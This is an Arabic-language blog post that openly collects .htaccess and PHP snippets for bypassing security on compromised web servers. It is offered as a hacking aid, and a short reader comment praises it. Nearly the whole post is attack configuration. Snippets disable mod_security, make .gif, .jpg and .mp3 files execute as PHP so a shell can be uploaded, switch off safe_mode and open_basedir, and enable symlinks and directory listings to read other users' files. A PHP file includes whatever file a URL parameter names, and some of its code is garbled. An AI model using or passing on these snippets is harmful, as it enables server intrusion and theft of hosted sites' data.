16922060824144624
recent
أخبار ساخنة

تخطي جميع الحمايات ب واسطة ملف htaccess

الخط

السلام عليكم و رحمة اللله و بركاته 
اليوم و في هده التدوينة المتواضعة سوف نتكلم على احد اهم و ابرز الموضوغات الشيقة في عالم اختراق المواقع و الا و هي تخطي الحمايات في اختراق السيرفرات عن طريق ملف htaccess ف قمت ب جمع ابرز الكودات التي انت ب حاجة اليها في عمليات تخطي الحمايات 
تابع معي

التحكم باصدار php

كود : 
AddType application/x-httpd-php4 .php

تتغير امتداد او لاحقة php الى امتداد gif,jpg

AddType application/x-httpd-php .gif
AddType application/x-httpd-php .jpg

تحكم بcgi-s cript ولاحقاته وتشغيلها

AddHandler cgi-s cript .pp .pl .txt

تخطي الـ LiteSpeed
<Files *.php>
ForceType application/x-httpd-php4
</Files>
<ifModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>  




تخطي السيف مود safe_mode بحالة Suexec

suPHP_ConfigPath /home/user/public_html/php.ini

تخطي الفور بدن Forbidden

1  


Options FollowSymLinks MultiViews Indexes ExecCGI


2


Options Indexes FollowSymLinks 
DirectoryIndex ssssss.htm 
AddType txt .php 
AddHandler txt .php 






3



Options All
DirectoryIndex ssss.html 
addType txt .php 
AddHandler txt .php  

<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>






4


Options All
ReadMeName 1.txt





5


suPHP_ConfigPath /home/user/public_html/php.ini





6


Options all
Options +FollowSymLinks
DirectoryIndex Sux.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php
AddType text/plain .html






7


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php
<IfModule mod_autoindex.c> 
IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble 
</ifModule>
<IfModule mod_security.c> 
SecFilterEngine Off 
SecFilterScanPOST Off 
</IfModule>



تخطي انترنت سيرفر ارور  HTTP 500 Internal Server Error


<IfModule mod_security.c>
    SecFilterEngine Off
    SecFilterScanPOST Off
</IfModule>





تخطي مراكز التحميل رفع الشل باي امتداد


<FilesMatch "^.*\.mp3">
   SetHandler application/x-httpd-php
</FilesMatch>








تشغيل البيرل باي امتداد


AddHandler cgi-script .CH
AddHandler cgi-script .txt
AddHandler cgi-script .pp
AddHandler cgi-script .pl





تشغيل البيرل وملفات السي جي اذا كان محمي منhttp.conf ببعض اضافة لاحقاته المعروفة pl,cgi

Options ExecCGI
AddType application/x-httpd-cgi .xx
AddHandler cgi-s cript .xx





تشغيل او تعطيل register_globals


php_flag register_globals "off"


تعطيل المود السيكيورتي


<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>




تعطيل او تشغيل open_basedir


php_flag open_basedir "off"




تغير اصدار ال php


AddType application/x-httpd-php4 .php




سحب ملف بصلاحيه يوزر

AddType text/plain .php
Options +Indexes
DirectoryIndex filename.html





سماح و تشغيل الكل 


Options All





عرض وسماح لملفات الاختصار symlinks


Options FollowSymLinks



و الان الشيء المهم جدا 
و هو تخطي السيف مود safe_mode

قم ب انشاء او تعديل ملف ب اسم  ini.php
و ضع هادا الكود 



echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"file"sansursansursansur93;);
ini_restore("safe_mode");
ini_restore("open_basedir");
echo ini_get("safe_mode");
echo ini_get("open_basedir");
include($_GETsansursansursansur91;"ss"sansursansursansur93;);
?>



و الان قم ب انشاء ملف ب اسم php.ini او ابحث عليه و قم ب التعديل عليه 
ضع هادا الكود 



safe_mode = off





تخطي SymLinks




Options +FollowSymLinks
DirectoryIndex Index.html
Options +Indexes
AddType text/plain .php
AddHandler server-parsed .php





تخطي SymLinks   بقوة 


Options Indexes FollowSymLinks
DirectoryIndex ssssss.htm
AddType txt .php
AddHandler txt .php





في الاخير اتمنى انكم قد استفدتم من هده المدونة المتواضعة و المتعوب عليها في التجميع 😉😉😉😉
  1. مدومة ما شاء الله و قد استفدنا منها الكثير و الكثير

    ردحذف

إرسال تعليق

نموذج الاتصال
الاسمبريد إلكترونيرسالة